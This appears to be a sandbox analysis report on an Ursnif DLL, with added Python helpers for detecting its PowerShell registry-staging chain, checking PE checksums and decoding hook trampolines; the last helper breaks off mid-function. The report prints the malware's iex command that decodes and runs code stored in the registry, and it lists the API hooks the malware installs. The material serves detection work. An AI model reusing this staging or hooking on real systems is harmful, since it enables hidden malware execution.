Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Fitsecond
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Pastput
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.393718546.000002846EF00000.00000002.00000001.sdmp, csc.exe, 0000001B.00000002.408584301.00000220E4530000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.427307077.0000022082640000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdbXP source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdbXP source: powershell.exe, 0000001A.00000002.543371423.000001DB0CC7E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdb8 source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: loaddll32.exe, 00000000.00000002.484513527.000000006E279000.00000002.00020000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdb8 source: powershell.exe, 0000001A.00000002.543279635.000001DB0CC3E000.00000004.00000001.sdmp
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
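The four process-creation lines above are the same staging step: mshta.exe launches PowerShell, which reads a REG_BINARY value from a GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft, converts the bytes to a string and hands it to Invoke-Expression. The Python below is an added example, not part of the sandbox report: it flags that shape in process-creation records and pulls out the registry key and value name so the stage can be collected from the host and decoded offline instead of run. The ProcessEvent record layout and the third, benign, sample line are constructed for the example; the first two records mirror lines from this report.

```python
"""Triage helpers for the mshta -> powershell -> iex chain listed above.

Added example, not part of the sandbox report. The ProcessEvent records are
constructed to mirror the report's 'Process created' lines; the field names
are an assumption, not a Joe Sandbox export format.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Loose patterns so alias choice (iex / Invoke-Expression, gp / Get-ItemProperty),
# casing and quoting do not defeat the check.
INVOKE_EXPRESSION = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DECODE_TO_STRING = re.compile(r"\[(System\.)?Text\.Encoding\]::\w+\.GetString\s*\(", re.I)
REGISTRY_READ = re.compile(
    r"\b(gp|get-itemproperty)\b\s+['\"]?(?P<key>HK\w+:[^'\"\s)]+)['\"]?\s*\)\s*\.\s*(?P<value>\w+)",
    re.I,
)
# Ursnif keeps its PowerShell stage in a REG_BINARY value under a random GUID key here.
APPDATALOW = re.compile(r"HKCU:\\?Software\\AppDataLow\\Software\\Microsoft\\", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class ProcessEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


def _basename(path: str) -> str:
    return path.strip("'\"").lower().rsplit("\\", 1)[-1]


def is_encoded_iex(ev: ProcessEvent) -> bool:
    """A script host spawns PowerShell that turns bytes into a string and feeds
    the result to Invoke-Expression: the shape of the report's command line."""
    if _basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    if _basename(ev.parent) not in SCRIPT_HOSTS:
        return False
    return bool(INVOKE_EXPRESSION.search(ev.cmdline) and DECODE_TO_STRING.search(ev.cmdline))


def extract_staging_location(cmdline: str) -> Optional[Tuple[str, str]]:
    """Registry key and value name the command line reads its stage from, so
    the blob can be collected and decoded offline instead of executed."""
    m = REGISTRY_READ.search(cmdline)
    return (m.group("key"), m.group("value")) if m else None


def is_appdatalow_stage(key: str) -> bool:
    return bool(APPDATALOW.search(key))


def decode_stage(raw: bytes) -> str:
    """The ASCII.GetString step of the command line, applied to a collected
    REG_BINARY blob; replacement on non-ASCII bytes keeps triage from failing
    on a tampered or oddly typed value."""
    return raw.decode("ascii", errors="replace")


def triage(events: List[ProcessEvent]) -> List[dict]:
    """Return one finding per matching event, with the staging location."""
    findings = []
    for ev in events:
        if not is_encoded_iex(ev):
            continue
        loc = extract_staging_location(ev.cmdline)
        findings.append({
            "parent": ev.parent,
            "cmdline": ev.cmdline,
            "key": loc[0] if loc else None,
            "value": loc[1] if loc else None,
            "ursnif_style_location": bool(loc and is_appdatalow_stage(loc[0])),
        })
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records: the first two mirror lines from this report, the third is benign.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", PS,
                 "'" + PS + r"' iex ([System.Text.Encoding]::ASCII.GetString(( gp "
                 r"'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcessEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                 r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths "
                 r"@'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["key"], f["value"], "ursnif-style" if f["ursnif_style_location"] else "")
```

The parent check matters: PowerShell decoding a string and calling iex is common in administrative scripts, but a PowerShell child of mshta.exe reading its code out of HKCU\Software\AppDataLow is the Ursnif pattern, and the key path extracted here is the artifact to export (reg export, or Get-ItemProperty into a file) before the host is remediated.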
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231D62 LoadLibraryA,GetProcAddress, 0_2_6E231D62
PE file contains an invalid checksum
Source: tangn2aw.dll.27.dr Static PE information: real checksum: 0x0 should be: 0x431a
Source: beneficial.dll Static PE information: real checksum: 0xadda3 should be: 0xa6c2b
Source: 4mppu3lx.dll.34.dr Static PE information: real checksum: 0x0 should be: 0xcdb2
Source: kdz1kgtq.dll.23.dr Static PE information: real checksum: 0x0 should be: 0x870d
Source: y3j0hr41.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x1036d
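The "real checksum ... should be" pairs above come from recomputing the optional-header CheckSum over the whole file and comparing it with the stored field. The Python below is an added example, not part of the sandbox report or of Joe Sandbox: it implements the same word-sum algorithm that imagehlp's MapFileAndCheckSum uses, reports whether the field is zero, correct or wrong, and can write the correct value back. build_minimal_pe() fabricates a tiny synthetic PE32 image so the code runs offline; it is not one of the files from this report.

```python
"""Recompute and verify the PE optional-header CheckSum.

Added example, not part of the sandbox report. Same word-sum algorithm as
imagehlp's MapFileAndCheckSum; build_minimal_pe() is a synthetic image used
only so the code runs stand-alone.
"""
import struct

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def _checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (optional header + 0x40)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    optional_header = e_lfanew + 4 + 20          # signature + IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", data, optional_header)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return optional_header + 0x40                # same offset for PE32 and PE32+


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, _checksum_field_offset(data))[0]


def compute_checksum(data: bytes) -> int:
    """Sum the file as little-endian 32-bit words (zero-padding the tail),
    skipping the CheckSum field itself, fold the carries down to 16 bits and
    add the file size."""
    skip = _checksum_field_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    total &= 0xFFFF
    return total + len(data)


def verify_checksum(data: bytes):
    """(stored, computed, status): 'zero' when the linker never filled the field,
    'ok' when it matches, 'mismatch' when the image changed after linking."""
    stored = stored_checksum(data)
    computed = compute_checksum(data)
    if stored == 0:
        return stored, computed, "zero"
    return stored, computed, "ok" if stored == computed else "mismatch"


def patch_checksum(data: bytes) -> bytes:
    """Return a copy of the image with the correct checksum written in."""
    off = _checksum_field_offset(data)
    return data[:off] + struct.pack("<I", compute_checksum(data)) + data[off + 4:]


def build_minimal_pe(checksum: int = 0, payload: bytes = b"\xCC" * 37) -> bytes:
    """Synthetic PE32 with one section header: enough structure for the
    checksum code, not a loadable module."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 0x40, checksum)
    section = bytearray(40)
    section[:5] = b".text"
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(section) + payload


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    stored, computed, status = verify_checksum(image)
    print("stored 0x%x computed 0x%x: %s" % (stored, computed, status))
```

Read the two kinds of finding differently. A zero field, as on the four csc.exe-compiled DLLs, only means the linker never filled it in, which is common for user-mode binaries. A populated but wrong value, as on beneficial.dll (0xadda3 stored, 0xa6c2b computed), means the bytes changed after the linker wrote the field, which is what packing, patching or appended data produces.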
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232210 push ecx; ret 0_2_6E232219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232263 push ecx; ret 0_2_6E232273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04864EE0 push ecx; ret 0_2_04864EE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0486528F push ecx; ret 0_2_0486529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E4EE0 push ecx; ret 3_2_053E4EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E528F push ecx; ret 3_2_053E529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7E1F push ecx; ret 5_2_063F7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7AB0 push ecx; ret 5_2_063F7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063FB1DE push esp; iretd 5_2_063FB26C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0C4ED push 3B000001h; retf 42_2_00F0C4F2

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
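The inline-hook finding above is a byte comparison: the first bytes of CreateProcessAsUserW in explorer.exe's memory no longer match the function's original prologue. The Python below is an added example, not part of the sandbox report: it performs that comparison between a clean prologue and a captured one and, when the rewritten bytes begin with one of the usual trampoline shapes (jmp rel32, jmp [rip+disp32], push/ret, mov rax/jmp rax), computes where control is redirected. All byte strings and the function address are constructed; the clean prologue is an illustrative x64 prologue, not the real bytes of kernel32!CreateProcessAsUserW, and the report's six "new code" bytes appear only as an input.

```python
"""Diff a captured function prologue against its clean copy and decode the hook.

Added example, not part of the sandbox report. CLEAN_PROLOGUE, FUNCTION_VA and
the SAMPLES are constructed for illustration.
"""
import struct
from typing import Dict, Optional, Tuple

MASK64 = 0xFFFFFFFFFFFFFFFF


def _rel32(buf: bytes, off: int) -> int:
    return struct.unpack_from("<i", buf, off)[0]


def decode_trampoline(code: bytes, va: int) -> Tuple[str, Optional[int]]:
    """Classify the instruction at virtual address `va`. The target is the
    jump destination for E9/EB, the pointer slot for FF 25 (a second memory
    read is needed to resolve it), or the immediate for push/ret and
    mov rax/jmp rax stubs."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        return "jmp rel32", (va + 5 + _rel32(code, 1)) & MASK64
    if len(code) >= 2 and code[0] == 0xEB:                       # jmp rel8
        return "jmp rel8", (va + 2 + struct.unpack_from("<b", code, 1)[0]) & MASK64
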